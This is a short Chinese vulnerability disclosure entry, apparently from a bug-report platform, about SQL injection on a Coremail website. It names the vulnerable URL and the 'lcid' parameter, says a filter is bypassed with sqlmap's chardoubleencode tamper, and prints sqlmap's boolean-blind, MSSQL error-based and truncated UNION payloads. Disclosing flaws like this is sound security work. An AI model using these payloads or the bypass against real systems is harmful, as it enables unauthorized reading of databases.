Coremail官网SQL注入可读全库

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: coremail官网存在注入,有防护,可绕过。 ### 详细说明: 漏洞地址:http://www.coremail.cn/gjzc2/list_117.aspx?lcid=412 ### 漏洞证明: 有防护,直接用sqlmap加个tamper=chardoubleencode.py可以跑出来。 这个是sqlmap用的payload: Place: GET Parameter: lcid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: lcid=412) AND 4972=4972 AND (7728=7728 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: lcid=412) AND 8722=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(111)+CHAR(113)+(SELECT (CASE WHEN (8722=8722) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(106)+CHAR(113))) AND (9712=9712 Type: UNION query Title: Generic UNION query (NULL) - 20 columns Payload: lcid=412) UNION ALL SELECT...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息